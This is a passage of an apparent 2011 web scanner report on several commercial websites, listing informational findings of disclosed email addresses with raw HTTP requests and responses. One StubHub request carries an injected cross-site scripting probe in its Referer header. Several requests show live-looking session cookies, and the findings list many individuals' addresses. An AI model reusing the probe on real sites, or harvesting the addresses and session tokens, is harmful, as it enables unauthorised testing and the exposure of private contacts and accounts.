23.50. http://www.fastteks.com/TechSolutions/About-Us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/About-Us.aspx

Issue detail

The following email addresses were disclosed in the response:

mandersen@fastteks.com
sales@352media.com

Request

GET /TechSolutions/About-Us.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Contact-Us.aspx?id=443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:01:18 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 363232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...

...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...

23.51. http://www.fastteks.com/TechSolutions/Contact-Us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/Contact-Us.aspx

Issue detail

The following email addresses were disclosed in the response:

info@fastteks.com
mandersen@fastteks.com
sales@352media.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:00:43 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 125293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...

...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<a class="emailLink" href="mailto:info@fastteks.com">
info@fastteks.com</a>
...[SNIP]...

23.52. http://www.fastteks.com/TechSolutions/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/Default.aspx

Issue detail

The following email addresses were disclosed in the response:

mandersen@fastteks.com
sales@352media.com

Request

GET /TechSolutions/Default.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/About-Us.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.5.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:03:47 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 382448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...

...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">
...[SNIP]...

23.53. http://www.fastteks.com/TechSolutions/News.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/News.aspx

Issue detail

The following email addresses were disclosed in the response:

mandersen@fastteks.com
sales@352media.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:03:42 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 399254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...

...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...

23.54. http://www.fastteks.com/TechSolutions/Services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/Services.aspx

Issue detail

The following email addresses were disclosed in the response:

mandersen@fastteks.com
sales@352media.com

Request

GET /TechSolutions/Services.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/techsolutions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.1.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:00:31 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 362186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...

...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<A href="mailto:mandersen@fastteks.com">
...[SNIP]...
<A href="mailto:mandersen@fastteks.com">
...[SNIP]...

23.55. http://www.fastteks.com/techsolutions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/techsolutions/

Issue detail

The following email addresses were disclosed in the response:

mandersen@fastteks.com
sales@352media.com

Request

GET /techsolutions/ HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:59:39 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 382448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...

...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">
...[SNIP]...

23.56. http://www.gamestop.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/

Issue detail

The following email address was disclosed in the response:

yourname@address.com

Request

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:25 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4265,4151,4287,4300,3852,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
entPlaceHolder_dynamicContent_ctl00_RepeaterCenterColumnLayouts_ctl01_CenterColumnPlaceHolder_ctl00_ctl00_ctl09_StackPlaceHolder_ctl00_ctl00_ctl00_StandardPlaceHolder_ctl00_txtNewsletterSignup" value="yourname@address.com" onfocus="this.value=''" class="mdmField" />
...[SNIP]...

23.57. http://www.googlelabs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlelabs.com
Path:	/

Issue detail

The following email address was disclosed in the response:

guru@googlelabs.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Content-Language: en-us
Date: Tue, 19 Jul 2011 20:49:41 GMT
Server: Google Frontend
Content-Length: 47646

<!DOCTYPE html>
<html lang="en-US">

<head>
<script type="text/javascript">(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};thi
...[SNIP]...
Application intended for chat (IM) users, including users using chat
clients on low-end phones, allowing them to answer simple web queries
from the context of their chat application. First invite guru@googlelabs.com to chat, and then
send queries via your chat client. Categories supported include
weather, translation, unit and currency conversions, and sports
scores. Send "help" for more information.
...[SNIP]...

23.58. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The following email address was disclosed in the response:

intelex@intelex.com

Request

Response

23.59. http://www.intelex.com/landing/~/script/highslide/highslide.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/~/script/highslide/highslide.css

Issue detail

The following email address was disclosed in the response:

intelex@intelex.com

Request

Response

23.60. http://www.linode.com/faq.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linode.com
Path:	/faq.cfm

Issue detail

The following email address was disclosed in the response:

service@linode.com

Request

GET /faq.cfm HTTP/1.1
Host: www.linode.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linode.com/2011/07/13/introducing-nodebalancer/
Cookie: __utma=237427869.559622143.1311085869.1311085869.1311085869.1; __utmb=237427869.1.10.1311085869; __utmc=237427869; __utmz=237427869.1311085869.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 14:31:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 15122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head>
<title>Linode - faq</title>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="d
...[SNIP]...
<a href="mailto:service@linode.com">
...[SNIP]...

23.61. http://www.livedrive.com/Scripts/PreloadImages.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/Scripts/PreloadImages.js

Issue detail

The following email address was disclosed in the response:

scott@filamentgroup.com

Request

GET /Scripts/PreloadImages.js HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US

Response

23.62. http://www.livedrive.com/Scripts/typeface.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/Scripts/typeface.js

Issue detail

The following email address was disclosed in the response:

davidchester@gmx.net

Request

GET /Scripts/typeface.js HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US

Response

23.63. http://www.mavitunasecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavitunasecurity.com
Path:	/

Issue detail

The following email address was disclosed in the response:

contact@mavitunasecurity.com

Request

Response

23.64. http://www.mookie1.com/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mookie1.com
Path:	/contact.php

Issue detail

The following email address was disclosed in the response:

info@themig.com

Request

GET /contact.php HTTP/1.1
Host: www.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660; s_cc=true; s_sq=247oasgendev%3D%2526pid%253Dwe%2526pidt%253D1%2526oid%253Dhttp%25253A//www.mookie1.com/contact.php%2526ot%253DA; OAS_SC1=1311100945269; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 8578

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="The MIG, Media Innovation, Media Innovat
...[SNIP]...
<a href="mailto:info@themig.com?subject=Media Innovation Group inquiry">info@themig.com</a>
...[SNIP]...

23.65. http://www.netlogiq.ro/js/jquery.emptyOnFocus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlogiq.ro
Path:	/js/jquery.emptyOnFocus.js

Issue detail

The following email address was disclosed in the response:

andrei.eftimie@netlogiq.ro

Request

GET /js/jquery.emptyOnFocus.js HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 24 Jul 2008 09:23:50 GMT
Accept-Ranges: bytes
ETag: "0d765fb6eedc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:35 GMT
Content-Length: 1271

/*
* @author Andrei Eftimie
* @email andrei.eftimie@netlogiq.ro
* @copyright (c) Netlogiq
* @web http://www.netlogiq.ro
* http://www.netlogiq.com
*
* Required Markup
* ---------------
* <div class="div">
...[SNIP]...

23.66. http://www.netlogiq.ro/js/jquery.hoverIntent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlogiq.ro
Path:	/js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /js/jquery.hoverIntent.js HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 05 May 2008 09:12:42 GMT
Accept-Ranges: bytes
ETag: "021312c90aec81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:35 GMT
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.67. http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js

Issue detail

The following email address was disclosed in the response:

brandon.aaron@gmail.com

Request

GET /_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: zipcode=05672|AAA|36; acezipcode=36|AAA|05672

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 4879
Content-Type: application/x-javascript
Content-Location: http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js
Last-Modified: Fri, 17 Jun 2011 11:16:23 GMT
Accept-Ranges: bytes
ETag: "6d28cfedf2ccc1:5897"
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 19:04:25 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...
ided so that one could change
*        the src of the iframe to whatever they need.
*        Default: "javascript:false;"
*
* @name bgiframe
* @type jQuery
* @cat Plugins/bgiframe
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
$.fn.bgIframe = $.fn.bgiframe = function(s) {
   // This is only for IE6
   if ( $.browser.msie && /6.0/.test(navigator.userAgent) ) {
       s = $.extend({
           top : 'auto',
...[SNIP]...

23.68. http://www.nne.aaa.com/style%20library/js/tracking/sitecatalyst_scode.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/style%20library/js/tracking/sitecatalyst_scode.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /style%20library/js/tracking/sitecatalyst_scode.js HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: zipcode=05672|AAA|36; acezipcode=36|AAA|05672

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:29 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=3600
ETag: "{F2BD07B6-4347-4292-9586-6ADD471130EE},58pub"
Content-Type: application/x-javascript
Vary: Accept-Encoding, User-Agent
Content-Length: 37500

.../* ACSC support code for SiteCatalyst version H.20.3.
   Usage:
   1.reference site catalyst js file at /style%20library/js/tracking/sitecatalyst_scode.js
   2.define an anonymous javascript object f
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

23.69. http://www.rallydev.com/js/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rallydev.com
Path:	/js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /js/jquery.colorbox-min.js HTTP/1.1
Host: www.rallydev.com
Proxy-Connection: keep-alive
Referer: http://www.rallydev.com/agile_products/editions/community/signup/?ppc=google&kw=bug_tracking&gclid=CMWl_YzNjaoCFYpd5Qodq3Z4og
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2g3gkrl3hj7h7nuupane9re3r3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:37 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=300
Expires: Tue, 19 Jul 2011 14:25:37 GMT
P3P: CP="NON DSP COR CURa PSAa PSDa OUR NOR BUS PUR COM NAV STA"
Content-Length: 9281
Content-Type: text/javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V).f
...[SNIP]...

23.70. http://www.stubhub.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/

Issue detail

The following email address was disclosed in the response:

technology@stubhub.com

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-688439129 HTTP/1.1
Host: www.stubhub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62%27%3balert(1)//460f48c4516

Response

HTTP/1.1 502 Bad Gateway
Date: Tue, 19 Jul 2011 19:37:58 GMT
Server: Apache
Set-Cookie: TLTHID=9B57C998B23E10B2041EBFC06CA23456; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Content-Length: 341
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>502 Bad Gateway</title>
</head><body>
<h1>Bad Gateway</h1>
<p>The proxy server received an invalid
response from an upstream ser
...[SNIP]...
<a href="mailto:technology@stubhub.com">
...[SNIP]...

23.71. http://www.stubhub.com/content/getPromoContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/content/getPromoContent

Issue detail

The following email address was disclosed in the response:

getPromoContent@srwp01brs006.stubprod.com

Request

Response

23.72. http://www.ticketmaster.com/event/000043582C516D43 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/event/000043582C516D43

Issue detail

The following email address was disclosed in the response:

ADAinfo@nmstadco.com

Request

Response

23.73. http://www.versionone.com/LandingPgTemp/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.versionone.com
Path:	/LandingPgTemp/js/global.js

Issue detail

The following email addresses were disclosed in the response:

david.hussman@devjam.com
dmantica@aspetech.com
info@sligerconsulting.com
info@solutionsiq.com
mary.anderson@3back.com
mike.shalloway@netobjectives.com
pete@trailridgeconsulting.com
ranton@ccpace.com
sales@atlassian.com
sales@automatedqa.com
sales@featureplan.com
sanjiv.augustine@lithespeed.com
sanjiv.rdymond@innovel.net

Request

GET /LandingPgTemp/js/global.js HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
